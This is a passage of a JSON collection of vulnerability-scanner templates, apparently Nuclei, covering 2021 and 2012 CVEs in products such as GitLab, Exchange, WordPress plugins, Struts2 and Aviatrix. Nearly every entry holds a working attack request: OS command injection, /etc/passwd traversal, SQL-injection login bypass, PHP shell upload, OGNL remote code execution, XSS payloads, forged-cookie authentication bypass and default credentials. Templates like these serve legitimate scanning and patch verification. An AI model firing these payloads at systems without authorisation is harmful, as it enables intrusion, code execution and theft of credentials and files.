Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"CVE-2021-40870\"); ?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["0d95513363fd69b9fee712f333293654"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory 